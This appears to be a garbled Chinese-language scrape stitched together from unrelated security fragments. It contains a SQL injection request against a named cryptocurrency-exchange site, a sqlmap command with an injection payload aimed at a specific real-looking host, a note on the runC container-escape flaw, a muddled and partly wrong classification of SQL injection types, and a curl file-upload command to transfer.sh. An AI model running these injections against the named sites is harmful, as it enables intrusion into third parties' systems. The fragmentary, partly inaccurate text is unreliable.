目标： 前台地址：FTFTX-全球数字货币交易所综合平台排行 漏洞地址： SQL包情况：1234567891011121314151617GET /ad/queryAll?position=index%27and%27e%27%3D%27

1sqlmap -u "http://www.stocambodia.com/search.php?act=detail&bglxid=972%E9%8E%88%27%22%5C%28&cc=41111111111

漏洞简述：攻击者可以通过特定的容器镜像或者exec操作可以获取到宿主机的runC执行时的文件句柄并修改掉runc的二进制文件，从而获取到宿主机的root执行权限。 利用条件：Docker版本 < 18.09.2，runC版本<

根据用于数据检索的传输信道，SQLi可分为三个独立的类别：inference（经典SQL注入）,inband（盲注、推理注入、带内注入）和out-of-band 一、什么是OOBout-of-band带外数据（OOB）与inband相反，它

# Upload using cURL $ curl –upload-file ./hello.txt https://transfer.sh/hello.txt https://transfer.sh/YD2SwK/he